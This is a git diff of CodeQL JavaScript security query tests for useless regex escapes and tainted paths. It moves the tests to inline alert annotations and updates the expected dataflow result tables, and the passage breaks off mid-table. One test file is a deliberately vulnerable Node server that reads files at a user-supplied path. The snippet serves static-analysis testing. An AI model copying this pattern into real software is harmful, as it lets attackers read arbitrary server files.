tst-escapes.js:17:11:17:12 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:17:8:17:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | -| tst-escapes.js:17:18:17:19 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:17:8:17:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | -| tst-escapes.js:18:9:18:10 | '\\{' is equivalent to just '{', so the sequence may still represent a meta-character | The escape sequence '\\{' is equivalent to just '{', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:18:11:18:12 | '\\}' is equivalent to just '}', so the sequence may still represent a meta-character | The escape sequence '\\}' is equivalent to just '}', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:18:17:18:18 | '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character | The escape sequence '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:18:23:18:24 | '\\?' is equivalent to just '?', so the sequence may still represent a meta-character | The escape sequence '\\?' is equivalent to just '?', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:41:9:41:10 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:41:8:41:11 | "\\." | regular expression | -| tst-escapes.js:56:10:56:11 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:56:8:56:13 | "[\\.]" | regular expression | -| tst-escapes.js:57:12:57:13 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:57:8:57:17 | "a[b\\.c]d" | regular expression | -| tst-escapes.js:60:9:60:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:60:8:60:19 | `\\k\\\\k\\d\\\\d` | regular expression | -| tst-escapes.js:60:14:60:15 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:60:8:60:19 | `\\k\\\\k\\d\\\\d` | regular expression | -| tst-escapes.js:61:9:61:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:61:8:61:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | -| tst-escapes.js:61:20:61:21 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:61:8:61:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | -| tst-escapes.js:64:9:64:10 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:64:8:64:11 | "\\]" | regular expression | -| tst-escapes.js:69:13:69:14 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:69:8:69:15 | "\\\\\\\\\\]" | regular expression | -| tst-escapes.js:73:17:73:18 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:73:8:73:19 | "\\\\\\\\\\\\\\\\\\]" | regular expression | +| tst-escapes.js:11:11:11:12 | '\\b' is a backspace, and not a word-boundary assertion | The escape sequence '\\b' is a backspace, and not a word-boundary assertion when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:13:11:14 | '\\c' is equivalent to just 'c', so the sequence is not a character class | The escape sequence '\\c' is equivalent to just 'c', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:15:11:16 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:29:11:30 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:39:11:40 | '\\p' is equivalent to just 'p', so the sequence is not a character class | The escape sequence '\\p' is equivalent to just 'p', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:45:11:46 | '\\s' is equivalent to just 's', so the sequence is not a character class | The escape sequence '\\s' is equivalent to just 's', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:12:11:12:12 | '\\B' is equivalent to just 'B', so the sequence is not an assertion | The escape sequence '\\B' is equivalent to just 'B', so the sequence is not an assertion when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:12:15:12:16 | '\\D' is equivalent to just 'D', so the sequence is not a character class | The escape sequence '\\D' is equivalent to just 'D', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:12:39:12:40 | '\\P' is equivalent to just 'P', so the sequence is not a character class | The escape sequence '\\P' is equivalent to just 'P', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:12:45:12:46 | '\\S' is equivalent to just 'S', so the sequence is not a character class | The escape sequence '\\S' is equivalent to just 'S', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:13:11:13:12 | '\\1' is equivalent to just '1', so the sequence is not a backreference | The escape sequence '\\1' is equivalent to just '1', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:13:13:14 | '\\2' is equivalent to just '2', so the sequence is not a backreference | The escape sequence '\\2' is equivalent to just '2', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:15:13:16 | '\\3' is equivalent to just '3', so the sequence is not a backreference | The escape sequence '\\3' is equivalent to just '3', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:17:13:18 | '\\4' is equivalent to just '4', so the sequence is not a backreference | The escape sequence '\\4' is equivalent to just '4', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:19:13:20 | '\\5' is equivalent to just '5', so the sequence is not a backreference | The escape sequence '\\5' is equivalent to just '5', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:21:13:22 | '\\6' is equivalent to just '6', so the sequence is not a backreference | The escape sequence '\\6' is equivalent to just '6', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:23:13:24 | '\\7' is equivalent to just '7', so the sequence is not a backreference | The escape sequence '\\7' is equivalent to just '7', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:25:13:26 | '\\8' is equivalent to just '8', so the sequence is not a backreference | The escape sequence '\\8' is equivalent to just '8', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:27:13:28 | '\\9' is equivalent to just '9', so the sequence is not a backreference | The escape sequence '\\9' is equivalent to just '9', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:31:13:32 | '\\-' is equivalent to just '-', so the sequence may still represent a meta-character | The escape sequence '\\-' is equivalent to just '-', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:14:17:14:18 | '\\$' is equivalent to just '$', so the sequence may still represent a meta-character | The escape sequence '\\$' is equivalent to just '$', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:21:14:22 | '\\^' is equivalent to just '^', so the sequence may still represent a meta-character | The escape sequence '\\^' is equivalent to just '^', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:25:14:26 | '\\*' is equivalent to just '*', so the sequence may still represent a meta-character | The escape sequence '\\*' is equivalent to just '*', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:27:14:28 | '\\(' is equivalent to just '(', so the sequence may still represent a meta-character | The escape sequence '\\(' is equivalent to just '(', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:29:14:30 | '\\)' is equivalent to just ')', so the sequence may still represent a meta-character | The escape sequence '\\)' is equivalent to just ')', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:33:14:34 | '\\+' is equivalent to just '+', so the sequence may still represent a meta-character | The escape sequence '\\+' is equivalent to just '+', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:15:9:15:10 | '\\[' is equivalent to just '[', so the sequence may still represent a meta-character | The escape sequence '\\[' is equivalent to just '[', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | +| tst-escapes.js:15:11:15:12 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | +| tst-escapes.js:15:18:15:19 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | +| tst-escapes.js:16:9:16:10 | '\\{' is equivalent to just '{', so the sequence may still represent a meta-character | The escape sequence '\\{' is equivalent to just '{', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:16:11:16:12 | '\\}' is equivalent to just '}', so the sequence may still represent a meta-character | The escape sequence '\\}' is equivalent to just '}', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:16:17:16:18 | '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character | The escape sequence '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:16:23:16:24 | '\\?' is equivalent to just '?', so the sequence may still represent a meta-character | The escape sequence '\\?' is equivalent to just '?', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:39:9:39:10 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:39:8:39:11 | "\\." | regular expression | +| tst-escapes.js:54:10:54:11 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:54:8:54:13 | "[\\.]" | regular expression | +| tst-escapes.js:55:12:55:13 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:55:8:55:17 | "a[b\\.c]d" | regular expression | +| tst-escapes.js:58:9:58:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:58:8:58:19 | `\\k\\\\k\\d\\\\d` | regular expression | +| tst-escapes.js:58:14:58:15 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:58:8:58:19 | `\\k\\\\k\\d\\\\d` | regular expression | +| tst-escapes.js:59:9:59:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:59:8:59:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | +| tst-escapes.js:59:20:59:21 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:59:8:59:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | +| tst-escapes.js:62:9:62:10 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:62:8:62:11 | "\\]" | regular expression | +| tst-escapes.js:67:13:67:14 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:67:8:67:15 | "\\\\\\\\\\]" | regular expression | +| tst-escapes.js:71:17:71:18 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:71:8:71:19 | "\\\\\\\\\\\\\\\\\\]" | regular expression | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref index 57187b21edf7..6898c59b4d29 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref @@ -1 +1,2 @@ -Security/CWE-020/UselessRegExpCharacterEscape.ql \ No newline at end of file +query: Security/CWE-020/UselessRegExpCharacterEscape.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index 4e2dcd674e79..b65448ec41b2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -1,5 +1,3 @@ -// (the lines of this file are not annotated with alert expectations) - // no backslashes RegExp("abcdefghijklmnopqrstuvxyz"); RegExp("ABCDEFGHIJKLMNOPQRSTUVXYZ"); @@ -10,12 +8,12 @@ RegExp("{}\"|<>?"); RegExp(" "); // backslashes -RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); -RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); -RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); -RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); -RegExp("\[\]\'\\,\.\/"); -RegExp("\{\}\\\"\|\<\>\?"); +RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); // $ Alert +RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); // $ Alert +RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); // $ Alert +RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); // $ Alert +RegExp("\[\]\'\\,\.\/"); // $ Alert +RegExp("\{\}\\\"\|\<\>\?"); // $ Alert RegExp("\ "); /\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\u\v\\x\y\z"/; /\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z/; @@ -38,7 +36,7 @@ RegExp("\\\\\\\\\a"); RegExp("\\\\\\\\\\a"); // string vs regexp -RegExp("\.") +RegExp("\.") // $ Alert "\."; // other @@ -53,21 +51,21 @@ RegExp("^\\\\Q\\\\E$"); RegExp("/\\*"); RegExp("/\ "); -RegExp("[\.]"); -RegExp("a[b\.c]d"); +RegExp("[\.]"); // $ Alert +RegExp("a[b\.c]d"); // $ Alert RegExp("\b"); RegExp(`\b`); -RegExp(`\k\\k\d\\d`) -RegExp(`\k\\k${foo}\d\\d`) +RegExp(`\k\\k\d\\d`) // $ Alert +RegExp(`\k\\k${foo}\d\\d`) // $ Alert // effective escapes -RegExp("\]") +RegExp("\]") // $ Alert RegExp("\\]") RegExp("\\\]"); // effectively escaped after all RegExp("x\\\]"); // effectively escaped after all RegExp("\\\\]") -RegExp("\\\\\]") +RegExp("\\\\\]") // $ Alert RegExp("\\\\\\]") RegExp("\\\\\\\]") // effectively escaped after all RegExp("\\\\\\\\]") -RegExp("\\\\\\\\\]") +RegExp("\\\\\\\\\]") // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql deleted file mode 100644 index 0183ac6ade66..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TaintedPathQuery -deprecated import utils.test.ConsistencyChecking - -deprecated class TaintedPathConsistency extends ConsistencyConfiguration { - TaintedPathConsistency() { this = "TaintedPathConsistency" } - - override DataFlow::Node getAnAlert() { TaintedPathFlow::flowTo(result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index f7c6d172ead2..573302c33cc5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -4,8 +4,7 @@ import { parse } from 'url'; import { join } from 'path'; var server = createServer(function(req, res) { - let path = parse(req.url, true).query.path; + let path = parse(req.url, true).query.path; // $ Source - // BAD: This could read any file on the file system - res.write(readFileSync(join("public", path))); + res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 8f1786508a59..4147726065ec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected @@ -1,665 +1,401 @@ -nodes -| TaintedPath-es6.js:7:7:7:44 | path | semmle.label | path | -| TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | semmle.label | parse(req.url, true) | -| TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | semmle.label | parse(r ... ).query | -| TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | semmle.label | parse(r ... ry.path | -| TaintedPath-es6.js:7:20:7:26 | req.url | semmle.label | req.url | -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | semmle.label | join("public", path) | -| TaintedPath-es6.js:10:41:10:44 | path | semmle.label | path | -| TaintedPath.js:9:7:9:48 | path | semmle.label | path | -| TaintedPath.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:9:24:9:30 | req.url | semmle.label | req.url | -| TaintedPath.js:12:29:12:32 | path | semmle.label | path | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | -| TaintedPath.js:15:45:15:48 | path | semmle.label | path | -| TaintedPath.js:18:33:18:36 | path | semmle.label | path | -| TaintedPath.js:21:33:21:36 | path | semmle.label | path | -| TaintedPath.js:24:33:24:36 | path | semmle.label | path | -| TaintedPath.js:33:31:33:34 | path | semmle.label | path | -| TaintedPath.js:38:3:38:44 | path | semmle.label | path | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:38:20:38:26 | req.url | semmle.label | req.url | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:42:48:42:51 | path | semmle.label | path | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | -| TaintedPath.js:46:45:46:48 | path | semmle.label | path | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:48:51:48:54 | path | semmle.label | path | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:50:50:50:53 | path | semmle.label | path | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| TaintedPath.js:52:52:52:55 | path | semmle.label | path | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | -| TaintedPath.js:54:49:54:52 | path | semmle.label | path | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:56:48:56:51 | path | semmle.label | path | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:58:54:58:57 | path | semmle.label | path | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | -| TaintedPath.js:60:57:60:60 | path | semmle.label | path | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:65:31:65:76 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:65:63:65:69 | req.url | semmle.label | req.url | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:66:31:66:74 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:66:61:66:67 | req.url | semmle.label | req.url | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:67:31:67:73 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:67:60:67:66 | req.url | semmle.label | req.url | -| TaintedPath.js:75:48:75:60 | req.params[0] | semmle.label | req.params[0] | -| TaintedPath.js:84:6:84:47 | path | semmle.label | path | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:84:23:84:29 | req.url | semmle.label | req.url | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | -| TaintedPath.js:86:44:86:47 | path | semmle.label | path | -| TaintedPath.js:87:14:87:17 | path | semmle.label | path | -| TaintedPath.js:88:32:88:39 | realpath | semmle.label | realpath | -| TaintedPath.js:89:45:89:52 | realpath | semmle.label | realpath | -| TaintedPath.js:120:6:120:47 | path | semmle.label | path | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:120:23:120:29 | req.url | semmle.label | req.url | -| TaintedPath.js:122:23:122:26 | path | semmle.label | path | -| TaintedPath.js:126:7:126:48 | path | semmle.label | path | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:126:24:126:30 | req.url | semmle.label | req.url | -| TaintedPath.js:128:19:128:22 | path | semmle.label | path | -| TaintedPath.js:130:7:130:29 | split | semmle.label | split | -| TaintedPath.js:130:15:130:18 | path | semmle.label | path | -| TaintedPath.js:130:15:130:29 | path.split("/") | semmle.label | path.split("/") | -| TaintedPath.js:132:19:132:23 | split | semmle.label | split | -| TaintedPath.js:132:19:132:33 | split.join("/") | semmle.label | split.join("/") | -| TaintedPath.js:136:19:136:23 | split | semmle.label | split | -| TaintedPath.js:136:19:136:26 | split[x] | semmle.label | split[x] | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | semmle.label | prefix + split[x] | -| TaintedPath.js:137:28:137:32 | split | semmle.label | split | -| TaintedPath.js:137:28:137:35 | split[x] | semmle.label | split[x] | -| TaintedPath.js:139:7:139:38 | concatted | semmle.label | concatted | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | -| TaintedPath.js:139:33:139:37 | split | semmle.label | split | -| TaintedPath.js:140:19:140:27 | concatted | semmle.label | concatted | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | semmle.label | concatted.join("/") | -| TaintedPath.js:142:7:142:39 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:142:20:142:24 | split | semmle.label | split | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | -| TaintedPath.js:143:19:143:28 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | -| TaintedPath.js:145:19:145:23 | split | semmle.label | split | -| TaintedPath.js:145:19:145:29 | split.pop() | semmle.label | split.pop() | -| TaintedPath.js:150:7:150:48 | path | semmle.label | path | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:150:24:150:30 | req.url | semmle.label | req.url | -| TaintedPath.js:154:29:154:32 | path | semmle.label | path | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:160:29:160:32 | path | semmle.label | path | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:161:29:161:32 | path | semmle.label | path | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:162:29:162:32 | path | semmle.label | path | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | semmle.label | path.re ... 